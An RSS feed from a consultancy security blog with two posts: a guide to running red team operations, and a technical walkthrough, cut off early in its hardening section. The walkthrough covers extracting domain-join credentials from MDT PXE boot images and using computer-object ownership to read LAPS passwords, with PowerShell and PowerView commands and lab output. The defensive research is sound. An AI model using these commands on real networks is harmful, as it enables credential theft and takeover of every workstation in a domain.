<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Rémi Escourrou, Auteur</title>
	<atom:link href="https://www.riskinsight-wavestone.com/en/author/remi-escourrou/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.riskinsight-wavestone.com/author/remi-escourrou/</link>
	<description>The cybersecurity &#38; digital trust blog by Wavestone&#039;s consultants</description>
	<lastBuildDate>Thu, 17 Jun 2021 07:25:49 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/Blogs-2024_RI-39x39.png</url>
	<title>Rémi Escourrou, Auteur</title>
	<link>https://www.riskinsight-wavestone.com/author/remi-escourrou/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to take advantage of a red team operation?</title>
		<link>https://www.riskinsight-wavestone.com/en/2020/08/how-to-take-advantage-of-a-red-team-operation/</link>
		
		<dc:creator><![CDATA[Rémi Escourrou]]></dc:creator>
		<pubDate>Tue, 25 Aug 2020 12:40:25 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[blue team]]></category>
		<category><![CDATA[CISO]]></category>
		<category><![CDATA[MITRE ATT&CK]]></category>
		<category><![CDATA[red team]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=14065</guid>

					<description><![CDATA[<p>Out of the 40 major incidents managed by CERT-Wavestone last year, only 26% of security incidents were identified by the organisation&#8217;s cyber detection team (the SOC in most cases). It is therefore quite logical that the ANSSI mentioned a collective...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/en/2020/08/how-to-take-advantage-of-a-red-team-operation/">How to take advantage of a red team operation?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com/en/">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="text-align: justify;">Out of the <a href="https://www.wavestone.com/app/uploads/2019/10/2019-Security-incident-response-benchmark-Wavestone.pdf">40 major incidents</a> managed by <a href="https://www.wavestone.com/en/capabilities/cybersecurity-digital-trust/cert-w/">CERT-Wavestone</a> last year, only 26% of security incidents were identified by the organisation&#8217;s cyber detection team (the SOC in most cases). It is therefore quite logical that the ANSSI mentioned a <strong>collective weakness in detection</strong> at the last French major security conference &#8220;les Assises de la Sécurité&#8221;.</p>
<p>&nbsp;</p>
<figure id="post-14725 media-14725" class="align-none"><img fetchpriority="high" decoding="async" class="aligncenter wp-image-14725 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/1595335008859.png" alt="" width="866" height="542" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/1595335008859.png 866w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/1595335008859-305x191.png 305w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/1595335008859-62x39.png 62w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/1595335008859-768x481.png 768w" sizes="(max-width: 866px) 100vw, 866px" /></figure>
<p style="text-align: justify;">But how to <strong>strengthen the detection</strong> of an intrusion into one&#8217;s company? Penetration testing allows us to evaluate the level of protection/hardening on a precise and supervised perimeter, which does not necessarily represent the reality experienced during a real situation. Crisis management simulations help to improve the response&#8230; Red Team operations can be a good element of response, allowing the information system and <strong>detection capabilities</strong> to be evaluated (and therefore improved) from the beginning to the end of a cyberattack.</p>
<p style="text-align: justify;">What is a Red Team operation? It is simply <strong>a realistic attack without the negative effects</strong>. The objective is to determine, today, what malicious actions a group of attackers can carry out on my company and when am I able to detect them?</p>
<p style="text-align: justify;">In this article, we will see what the key steps are in such an operation and how to ensure that we reap the benefits.</p>
<p>&nbsp;</p>
<h2>STEP 1: DEFINE THE CORE TEAM AND IDENTIFY THE TROPHY</h2>
<p style="text-align: justify;">Defining a restricted control team is essential to limit the leakage of information to the Blue Team (detection team, i.e. SOC), to make communications more fluid and to facilitate decision-making by the client. The control team must therefore be clearly separated from the Blue Team. <strong>Often the choice is made between the CISO or a representative of the ExCom</strong>, with whom the limits of the perimeter and the operating mode (as wide as possible) will have to be set, in order to avoid any unfortunate incident!</p>
<blockquote><p>&#8220;That&#8217;s out of scope&#8221; &#8211; Said no attacker ever</p></blockquote>
<p style="text-align: justify;">Then, a particularity of a Red Team operation is to define a &#8220;trophy&#8221;, the final target of the operation. Indeed, an attacker is often <strong>motivated by an objective</strong> (gain, destruction, data theft, &#8230;) and it is advisable to copy the Red Team&#8217;s objectives on it. The Red Team generally already has some good ideas but the best trophies (i.e. the strongest impact during the restitution) are closely linked to the <strong>business stakes</strong> of the company and its <strong>current events</strong>.</p>
<p style="text-align: justify;">The target must be the scenarios that are the most chilling for the managers: a remote takeover of the SWIFT infrastructure? A compromise of the payment terminals? The leakage of the VIP customer list? Positions taken in recent months abroad? The ideas may be numerous, but it is necessary to <strong>restrict oneself to one or two targets</strong> to keep the most critical ones visible. It will always be possible to identify another trophy for the next operation: it is even advisable to modify the trophies from one year to the next in order to test different parts of the information system.</p>
<p style="text-align: justify;">During our latest operations, ExComs have chosen <strong>scenarios that have already taken place during real cyber attacks</strong> they have been subjected to. This also enables them to assess the effectiveness of the new security measures implemented.</p>
<p>&nbsp;</p>
<h2>STEP 2: PREPARE AND LAUNCH THE ASSAULT BY MIXING EFFICIENCY AND STEALTH</h2>
<p style="text-align: justify;">The credibility of the attack is one of the key factors in the success of the operation, particularly during the restitution phase. Once the trophy has been arrested: we build an <strong>approach based on the techniques used by the attacking groups.</strong></p>
<p style="text-align: justify;">It is at this point that field returns are particularly useful! At Wavestone, we rely heavily on our Incident Response Team (CERT-W) and its <strong>Threat Intelligence capacity</strong> to identify the latest trends, on the <strong>technical know-how</strong> of our audit team and the <strong>creativity</strong> of our CTF (Capture The Flag) team.</p>
<p style="text-align: justify;">Thus, the Red Team will use <strong>all possible and necessary means</strong> to penetrate the IS (phishing campaign, telephone phishing, physical intrusion, compromise of components exposed on the internet&#8230;) and then bounce back to the trophy. This phase is the most <strong>creative</strong> and exciting for the listeners (as well as for the attackers), and can potentially last several weeks, just like the most high-profile cyber-attacks.</p>
<p style="text-align: justify;">However, the key word must remain: &#8220;stealth&#8221;! Indeed, the slightest detection by the Blue Team can totally derail or set back the operation. Particular attention must be paid to <strong>customised attack tools and infrastructures</strong> to <strong>avoid panicking the detection systems</strong>. For the first point, we have developed internally the <a href="https://github.com/wavestone-cdt/abaddon">Abaddon tool</a>, now open-source, which allows us to build and deploy the necessary infrastructures in just a few clicks.</p>
<p>&nbsp;</p>
<figure id="post-14728 media-14728" class="align-none"><img decoding="async" class="aligncenter wp-image-14728 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/0-8-1.png" alt="" width="1272" height="709" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/0-8-1.png 1272w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/0-8-1-343x191.png 343w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/0-8-1-71x39.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/0-8-1-768x428.png 768w" sizes="(max-width: 1272px) 100vw, 1272px" /></figure>
<p style="text-align: justify;">Two questions always come up when it comes to the conduct of a Red Team operation.</p>
<p style="text-align: justify;">The first one is &#8220;What to do <strong>in case of detection</strong>? ». That an action may be detected can happen during a Red Team operation: a good SIEM correlation rule, an informed user who shares an abnormal behaviour, etc&#8230; First of all, in the basic organisation, the <strong>control team must supervise incidents</strong> within the SOC in order to avoid an &#8220;over-escalation&#8221; in crisis of an incident related to the Red Team. The control unit will then be able to request <strong>a report from the Blue Team</strong> (summary, detected behaviour, timeline of actions, remedial actions, etc.) and then define the <strong>recovery scenario</strong> with the Red Team: ignore the detection because it is too old, start from the penultimate compromised asset that has not been detected, etc. Moreover, the work will become more complicated for the Red Team, which will have to completely change its C2 infrastructure and henceforth succeed in deceiving a Blue Team on alert.</p>
<p style="text-align: justify;">The second &#8220;If the <strong>trophy(s) are obtained very quickly</strong>, what can be done?&#8221; Let&#8217;s imagine the worst case scenario: the application administrator of the trophy gets trapped by a phishing email and allows us to take complete control of the application from the very beginning of the operation (Anyone can make a mistake). The point will be<strong> shared with the control team</strong> and the procedure to be followed will be defined jointly: add trophies to test the robustness of another perimeter, start from scratch and identify another compromise path, &#8230; This somewhat caricatural example is there to remind us that the objective of a Red Team operation is to <strong>durably improve the level of security</strong> via Blue Team training and not just to obtain a trophy.</p>
<p>&nbsp;</p>
<h2>STEP 3: PROVIDE A CLEAR RESPONSE TO A CRITICAL BUSINESS RISK</h2>
<p style="text-align: justify;">The objective remains to provide sponsors with a <strong>clear vision</strong> of the real security status of their IS, the attack scenarios that will give them access to their critical resources (identified as &#8220;trophies&#8221; of the operation), as well as their detection capabilities. Quite simply, the Red Team operation must make it possible to answer the question &#8220;Is the trophy accessible and with what level of expertise? ». However, it should be remembered that Operation Red Team will highlight an <strong>exploitable path</strong> that may not be the only or the simplest one.</p>
<p style="text-align: justify;">From then on, we return to the stakeholders (CISO, SOC, COMEX&#8230;) with a high-level synthesis in order to present the conclusions of the Red Team operation, the attack scenario followed and the most priority worksites. The results are generally compared with <strong>typical attacker profiles</strong> (Maze, REvil/Sodinoki&#8230;) on the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> reference frame to be more meaningful.</p>
<p>&nbsp;</p>
<figure id="post-14730 media-14730" class="align-none"><img decoding="async" class="aligncenter wp-image-14730 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/0-9.png" alt="" width="1170" height="229" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/0-9.png 1170w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/0-9-437x86.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/0-9-71x14.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/08/0-9-768x150.png 768w" sizes="(max-width: 1170px) 100vw, 1170px" /></figure>
<p style="text-align: justify;">In a second stage, the <strong>Blue Team will obviously have to be given a detailed</strong> account of the technical stages of the operation, with a view to defining areas of progress on detection.</p>
<blockquote><p>&#8220;If we win, we lose &#8221; Said a good red teamer</p></blockquote>
<p style="text-align: justify;">This second phase is fundamental for the operation to have the expected added value:<strong> pedagogy and clarity</strong> are needed to get the right messages across! Let&#8217;s not hesitate to hold <strong>additional workshops</strong> to explain the problems raised by the operation and to find solutions together. A <strong>joint interpretation of the findings</strong> by the Blue Team and the Red Team allows us to take a step back from the vulnerabilities and <strong>identify concrete actions for improvement</strong>.</p>
<p style="text-align: justify;">The Red Team operation should not be reduced to correcting a few vulnerabilities on the IS, but should make it possible to obtain the<strong> effective level of security</strong> (even if it is not exhaustive, as a Red Team will never be an audit).</p>
<p style="text-align: justify;">In a few words, a Red Team operation makes it possible to <strong>test its defence strategy on a large scale</strong> and to <strong>train</strong> (improve) its <strong>defence team</strong>. The very concrete nature of the trophies allows an understanding and awareness of the cyber risk of the <strong>decision-makers</strong>.</p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/en/2020/08/how-to-take-advantage-of-a-red-team-operation/">How to take advantage of a red team operation?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com/en/">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Taking over Windows Workstations thanks to LAPS and PXE</title>
		<link>https://www.riskinsight-wavestone.com/en/2020/01/taking-over-windows-workstations-pxe-laps/</link>
		
		<dc:creator><![CDATA[Rémi Escourrou]]></dc:creator>
		<pubDate>Fri, 31 Jan 2020 07:16:44 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[audit]]></category>
		<category><![CDATA[deep-dive]]></category>
		<category><![CDATA[laps]]></category>
		<category><![CDATA[pxe]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=15182</guid>

					<description><![CDATA[<p>&#160; The workstation remains one of the favorite targets during Red Team operations. However, its security level has drastically increased with security solutions such as Bitlocker or LAPS. Can these improvements introduce new attack paths? In this article we will...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/en/2020/01/taking-over-windows-workstations-pxe-laps/">Taking over Windows Workstations thanks to LAPS and PXE</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com/en/">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="separator" style="clear: both; text-align: center;">
<figure id="post-15541 media-15541" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15541 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/header.png" alt="" width="640" height="274" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/header.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/header-437x187.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/header-71x30.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<p>&nbsp;</p>
<div style="text-align: justify;"><b>The workstation remains one of the favorite targets during Red Team operations. However, its security level has drastically increased with security solutions such as Bitlocker or LAPS. Can these improvements introduce new attack paths?</b></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">In this article we will examine how the combination of two good security solutions with no apparent connection to each other can lead to the takeover of all workstations in a Windows environment. The main advantage of this technique is that it is exploitable in black box, i.e. without any prior knowledge of the target.</div>
<div style="text-align: justify;"></div>
<h2 style="text-align: justify;">Automated mastering of workstations</h2>
<div style="text-align: justify;">Deploying and configuring large numbers of workstations is a tedious task that can benefit from automation using tools such as Microsoft Deployment Toolkit (MDT) or System Center Configuration Manager (SCCM). These technologies allow, for example, to install a Windows image on a workstation from a network access and to automate its integration into the company&#8217;s Active Directory.</div>
<div style="text-align: justify;"></div>
<h3 style="text-align: justify;">Microsoft Deployment Toolkit (MDT)</h3>
<div style="text-align: justify;">Microsoft Deployment Toolkit [<b>MDT</b>] is a Microsoft tool that allows deploying a Windows image with a predefined configuration. MDT captures a Windows image (&#8220;.wim&#8221; format) and uses it to deploy Windows to new devices. To accelerate the deployment of a new device, these files are deployed on the network so that the workstation can boot on the network through PXE. By default, they are publicly accessible (without authentication) using the Trivial FTP protocol (TFTP).</div>
<div style="text-align: justify;"></div>
<h3 style="text-align: justify;">Boot PXE</h3>
<div style="text-align: justify;">The PXE boot (Pre-boot eXecution Environment) allows a workstation to boot from the network. It relies on a specific DHCP server response defined in RFC 4578 [<b>DHCP &amp; PXE</b>].</div>
<div style="text-align: justify;">The PXE client sends a DHCP request with specific options related to PXE and the DHCP server response give, in addition to the usual IP addressing information, the location of the pre-boot file on the network, accessible via TFTP.</div>
<div></div>
<div style="text-align: justify;"></div>
<div class="separator" style="clear: both; text-align: center;">
<figure id="post-15543 media-15543" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15543 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/1-1.png" alt="" width="640" height="114" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/1-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/1-1-437x78.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/1-1-71x13.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<div style="text-align: center;"><i><span style="font-size: x-small;">Fig. 1 : Download « wim » image</span></i></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Once the image is loaded, the client installs the content on the local disk and integrates it into the Active Directory through a dedicated service account included in the PXE pre-boot image. Once the installation is completed, the workstation is functional and the enrollment in the Active Directory is effective.</div>
<div style="text-align: justify;"></div>
<h3 style="text-align: justify;">Retrieval of sensitive data</h3>
<div style="text-align: justify;">These PXE boot features have already been studied by many people [<b>NETSPI</b>] and are useful for an attacker because they allow extracting sensitive information. Indeed, an attacker can boot on PXE and take advantage of this automated process to obtain a standard workstation in the target domain, without prior information.</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">In particular, it is possible to :</div>
<div style="text-align: justify;"></div>
<ul>
<li style="text-align: justify;">Press <b>F8 key</b> during the Windows PE deployment phase, which prompts an administrator console on the machine. This provides access to the contents of the file system that will be deployed to the workstation.</li>
<li style="text-align: justify;">Press <b>Shift+F10 </b>during the setup process will bring up a system console. For example, a local administrator account could be added on the device or the <b>SAM </b>and <b>SYSTEM </b>databases could be extracted to obtain the default password hash of the local administrator account;</li>
<li style="text-align: justify;">Extract and analyse the memory of the workstation during the setup in order to extract sensitive information;</li>
<li style="text-align: justify;">Retrieve the pre-boot image file &#8220;<b>.wim</b>&#8221; to access all the settings: password of the service account used for integration in the domain, files containing default passwords such as &#8220;<b>unattend.xml</b>&#8220;, etc.</li>
</ul>
<p>&nbsp;</p>
<div style="text-align: justify;">The next section will focus on this last option.</div>
<div style="text-align: justify;"></div>
<h3 style="text-align: justify;">Searching and extracting the image file</h3>
<div style="text-align: justify;">In order to make it easier to obtain the pre-boot image from a DHCP request, we developed a Powershell [<b>POWERPXE</b>] script to automate the following steps (additional steps are present in the case of SCCM [<b>SCCM &amp; PXE</b>]):</div>
<div style="text-align: justify;"></div>
<ul>
<li>Initialization of the DHCP exchange in &#8220;discover&#8221; mode;</li>
<li>Extraction of the location of the boot configuration file &#8220;.bcd&#8221; in the DHCP response;</li>
<li>Downloading the &#8220;bcd&#8221; file via TFTP;</li>
<li>Extraction of the location of the &#8220;.wim&#8221; image store in the boot configuration file;</li>
<li>Downloading the &#8220;.wim&#8221; image via TFTP;</li>
<li>Searching for plain text passwords, especially in the &#8220;Bootstrap.ini&#8221; and &#8220;CustomSettings.ini&#8221; files.</li>
</ul>
<p>&nbsp;</p>
<div style="text-align: justify;">This script needs to be run as an administrator to change the network interface configuration as well as open the boot configuration file.</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">To test this script, the reader could use the AutomatedLab [<b>AUTOMATEDLAB</b>] project and a specific configuration file hosted on GitHub [<b>POWERPXE</b>]. This lab consists of :</div>
<div style="text-align: justify;"></div>
<ul>
<li>A &#8220;lab.fr&#8221; domain controller;</li>
<li>A server with the &#8220;MDT&#8221; role exposing a DHCP service, network directories and a TFTP interface;</li>
<li>A server to test the attack, it is also possible to test the script with a simple network access.</li>
</ul>
<p>&nbsp;</p>
<div style="text-align: justify;"></div>
<style type="text/css">
span.w-code { display: block; background-color: black; font-size: 10pt; color: #E0E2E4; font-family: Monospace !important; white-space: pre-wrap; white-space: -moz-pre-wrap; white-space: -pre-wrap; white-space: -o-pre-wrap; word-wrap: break-word; line-height: 14px; padding: 1%;}<br />.w-user { color: cornflowerblue; font-family: Monospace !important;}<br />.w-root { color: lightcoral; font-family: Monospace !important;}<br />.w-server { color: chartreuse; font-family: Monospace !important;}<br />.w-cli { color: lightskyblue; font-family: Monospace !important;}<br />.w-grepped { color: red; font-family: Monospace !important;}<br />.w-all { font-family: Monospace !important; }<br />.w-inline-code { font-family: Monospace !important; color: #c7254e; background-color: #f9f2f4; border-radius: 4px; padding: 2px 4px; }<br /></style>
<p><span class="w-code"><span class="w-user">PS &gt;</span> <span class="w-root">Import-Module</span> .\PowerPXE.ps1<br />
<span class="w-user">PS &gt;</span> <span class="w-root">Get-PXECreds</span> -InterfaceAlias &#8220;<span class="w-server">lab 0</span>&#8221;<br />
&gt;&gt; Get a valid IP adress<br />
&gt;&gt;&gt; &gt;&gt;&gt; DHCP proposal IP address: 192.168.22.101<br />
&gt;&gt;&gt; &gt;&gt;&gt; DHCP Validation: DHCPACK<br />
&gt;&gt;&gt; &gt;&gt;&gt; IP address configured: 192.168.22.101<br />
&gt;&gt; Request BCD File path<br />
&gt;&gt;&gt; &gt;&gt;&gt; BCD File path: \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd<br />
&gt;&gt;&gt; &gt;&gt;&gt; TFTP IP Address: 192.168.22.3<br />
&gt;&gt; Launch TFTP download<br />
&gt;&gt;&gt;&gt; Transfer succeeded.<br />
&gt;&gt; Parse the BCD file: conf.bcd<br />
&gt;&gt;&gt;&gt; Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim<br />
&gt;&gt;&gt;&gt; Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim<br />
&gt;&gt; Launch TFTP download<br />
&gt;&gt;&gt;&gt; Transfer succeeded.<br />
&gt;&gt; Open LiteTouchPE_x86.wim<br />
&gt;&gt;&gt;&gt; Finding Bootstrap.ini<br />
&gt;&gt;&gt;&gt; &gt;&gt;&gt;&gt; DeployRoot = \\LAB-MDT\DeploymentShare$<br />
&gt;&gt;&gt;&gt; &gt;&gt;&gt;&gt; UserID = <span class="w-grepped">MdtService</span><br />
&gt;&gt;&gt;&gt; &gt;&gt;&gt;&gt; UserPassword = <span class="w-grepped">Somepass1</span><br />
[&#8230;]<br />
</span></p>
<div style="text-align: justify;">Note for the reader: if the account used to join the domain is in the &#8220;Domain Admins&#8221; group, it is your lucky day!!! <b>#TrueStory</b></div>
<div style="text-align: justify;">
<h3>Going further</h3>
</div>
<div style="text-align: justify;">This account is generally not tagged as sensitive, it may be found in other locations: SMB shares, SharePoint, etc.</div>
<div style="text-align: justify;">Also, if the PXE boot is restricted to a specific network zone, the &#8220;.wim&#8221; file or the associated configuration files &#8220;Bootstrap.ini&#8221; and &#8220;CustomSettings.ini&#8221; are generally accessible on file shares with little access control. In this case, read access to this file allows to perform the attack described in the next section.</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">
<h2>From domain join to administrative privileges on all workstations</h2>
</div>
<div style="text-align: justify;">
<h3>The privilege « Domain Join »</h3>
</div>
<div style="text-align: justify;">The &#8220;<b>Domain Join</b>&#8221; privilege (or joining a device in the domain) corresponds to the Active Directory privilege &#8220;Add workstation to domain&#8221; [<b>JOIN-DOMAIN</b>]. In the default configuration, any authenticated user can join up to 10 machines to the domain.</div>
<div style="text-align: justify;">However, in most companies, this privilege is restricted via a GPO (Group Policy Object) present in the domain.</div>
<div style="text-align: justify;">
<ul>
<li>Computer Configuration
<ul>
<li>Windows settings
<ul>
<li>Security Settings
<ul>
<li>User Rights Assignment
<ul>
<li>Add Workstations to the Domain</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div style="text-align: justify;">By default, the &#8220;<b>Account Operator</b>&#8221; group has the necessary privilege to join a machine to the domain. However, it is not recommended to use it because the privileges of this group are too high: for example, it allows opening an interactive session on the domain controllers.</div>
<div style="text-align: justify;">Usually a <b>dedicated service account </b>is created: this is a basic domain account with only specific privileges to be able to join a workstation to the domain.</div>
<div style="text-align: justify;">When a machine is integrated into the domain, an object of the class &#8220;computer&#8221; is created in the Active Directory. The user account used to create this object, i.e. joining a machine, is defined as the owner of this object.</div>
<div style="text-align: justify;">
<h3>How LAPS works</h3>
</div>
<div style="text-align: justify;">As the machines are deployed from a single template, the password of the local &#8220;Administrator&#8221; account (builtin, aka RID 500) is the same on all machines. This configuration is a vulnerability because it allows pivoting on all the others in case of compromise of a single machine. The robustness of the local account password is not even considered because it will be possible to move laterally with Pass The Hash (PtH).</div>
<div style="text-align: justify;">The &#8220;Local Administrator Password Solution&#8221; tool, LAPS, allows modifying and managing the passwords of one local account automatically.</div>
<div style="text-align: justify;">When the LAPS solution is installed, two security attributes are added to the machine class:</div>
<div style="text-align: justify;">
<ul>
<li>The &#8220;<b>ms-mcs-AdmPwd</b>&#8221; a &#8220;confidential&#8221; computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users</li>
<li>The &#8220;<b>ms-mcs-AdmPwdExpirationTime</b>&#8221; regular attribute computer attribute that stores the LAPS password reset date/time value.</li>
</ul>
</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">The &#8220;<b>Find-AdmPwdExtendedRights</b>&#8221; command inside the LAPS PowerShell module (the AdmPwd.PS module) identifies groups or users who can access the LAPS passwords. Indeed, this module lists the users with read access on the &#8220;<b>ms-mcs-AdmPwd</b>&#8221; attribute:</div>
<div style="text-align: justify;"></div>
<p><span class="w-code"><br />
<span class="w-user">PS &gt;</span> <span class="w-root">Import-Module</span> AdmPwd.PS<br />
<span class="w-user">PS &gt;</span> F<span class="w-root">ind-AdmPwdExtendedRights</span> | <span class="w-root">fl</span><br />
ObjectDN : OU=COMPUTER,DC=lab,DC=fr<br />
ExtendedRightHolders : {LAB\<span class="w-grepped">LAPS_recover</span>, LAB\<span class="w-grepped">Domain Admins</span>}<br />
</span></p>
<div style="text-align: justify;">
<h3>Taking over workstation thanks to LAPS</h3>
</div>
<div style="text-align: justify;">The owner of an object and the privileges granted to users (or other objects) on that object are stored in a security descriptor. Access rights (i.e. privileges) take the form of a <b>DACL </b>(Discretionary Access Control List) composed of <b>ACEs </b>(Access Control Entries), where each ACE describes one or more permissions granted or denied to a user.</div>
<div style="text-align: justify;">The following script extract the privileges granted by default (via ACEs) to the owner of a computer object:</div>
<p><span class="w-code"><span class="w-root">Import-module</span> ActiveDirectory<br />
## Extraction de la configuration par défaut d’un objet « computer »<br />
<span class="w-cli">$computerobject </span>= <span class="w-root">Get-ADObject</span> -SearchBase (Get-ADRootDSE).SchemaNamingContext -Filter {Name -eq &#8220;<span class="w-server">Computer</span>&#8221; } -Properties defaultSecurityDescriptor<br />
## Creation d’un objet permettant la gestion des ACL<br />
<span class="w-cli">$sec</span> = <span class="w-root">New-Object</span> System.DirectoryServices.ActiveDirectorySecurity<br />
<span class="w-cli">$sec</span>.SetSecurityDescriptorSddlForm(<span class="w-cli">$computerobject</span>.defaultSecurityDescriptor)<br />
## Recherche des privilèges du propriétaire de l’objet<br />
<span class="w-cli">$acc</span> = <span class="w-root">New-Object</span> System.Security.Principal.NTAccount(&#8220;<span class="w-server">CREATEUR PROPRIETAIRE</span>&#8220;) ## ou &#8220;CREATOR OWNER&#8221;<br />
<span class="w-cli">$sec</span>.GetAccessRules($true,$false,[System.Security.Principal.NTAccount]) | Where-Object {$_.IdentityReference -eq $acc}</span></p>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">The result of the command contains, among other things, the following ACE:</div>
<div style="text-align: justify;"></div>
<p><span class="w-code"><span class="w-root">ActiveDirectoryRights </span>: DeleteTree, <span class="w-grepped">ExtendedRight</span>, Delete, GenericRead<br />
<span class="w-root">InheritanceType</span> : None<br />
<span class="w-root">ObjectType</span> : 00000000-0000-0000-0000-000000000000<br />
<span class="w-root">InheritedObjectType </span>: 00000000-0000-0000-0000-000000000000<br />
<span class="w-root">ObjectFlags</span> : None<br />
<span class="w-root">AccessControlType </span>: Allow<br />
<span class="w-root">IdentityReference </span>: <span class="w-grepped">CREATEUR PROPRIETAIRE</span><br />
<span class="w-root">IsInherited </span>: False<br />
<span class="w-root">InheritanceFlags </span>: None<br />
<span class="w-root">PropagationFlags </span>: None</span></p>
<div style="text-align: justify;">The owner of an object, inherited from the class &#8220;computer&#8221;, has by default the privilege &#8220;ExtendedRight&#8221;. However, the &#8220;ExtendedRight&#8221; privilege, or rather &#8220;All extended rights&#8221; in the graphical interface, allows access to the LAPS password.</div>
<div style="text-align: justify;">For example, the password can be accessed using PowerView :</div>
<div style="text-align: justify;"></div>
<p><span class="w-code"><span class="w-user">PS &gt;</span> <span class="w-root">Import-Module</span> .\PowerView.ps1<br />
<span class="w-user">PS &gt;</span> <span class="w-root">Get-DomainComputer</span> <span class="w-server">COMPUTER </span>-Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime<br />
ComputerName : COMPUTER<br />
ms-mcs-AdmPwd : <span class="w-grepped">9g)4G+35w;2$</span><br />
ms-mcs-AdmPwdExpirationTime : 08/04/2019<br />
</span></p>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">The account used to join a machine in the domain can compromise it if LAPS is deployed. Furthermore, if the same account is used to perform all domain join, as is often the case using MDT or SCCM, the service account can take over all workstations.</div>
<div style="text-align: justify;">The owners of the &#8220;computer&#8221; objects can be identified with the following commands:</div>
<p><span class="w-code"><span class="w-root">Import-module</span> ActiveDirectory<br />
<span class="w-cli">$computers</span> = <span class="w-root">Get-ADComputer</span> -Filter <span class="w-server">*</span><br />
<span class="w-user">foreach </span>(<span class="w-cli">$comp</span> in <span class="w-cli">$computers</span>) {<br />
<span class="w-cli">$comppath</span> = &#8220;<span class="w-server">AD:$($comp.DistinguishedName.ToString())</span>&#8221;<br />
<span class="w-cli">$acl</span> = <span class="w-root">Get-Acl</span> -Path <span class="w-cli">$comppath</span><br />
<span class="w-root">Write-Host</span> <span class="w-cli">$comp</span>.SamAccountName <span class="w-cli">$acl</span>.Owner<br />
}<br />
</span></p>
<div style="text-align: justify;">
<h2>Hardening</h2>
</div>
<div style="text-align: justify;">
<h3>Protect the PXE boot sequence</h3>
</div>
<div style="text-align: justify;">To avoid an attacker with access to the corporate network booting into PXE, it is strongly recommended that the ability to boot this way is limited to specific network areas, such as dedicated rooms with physical access control.</div>
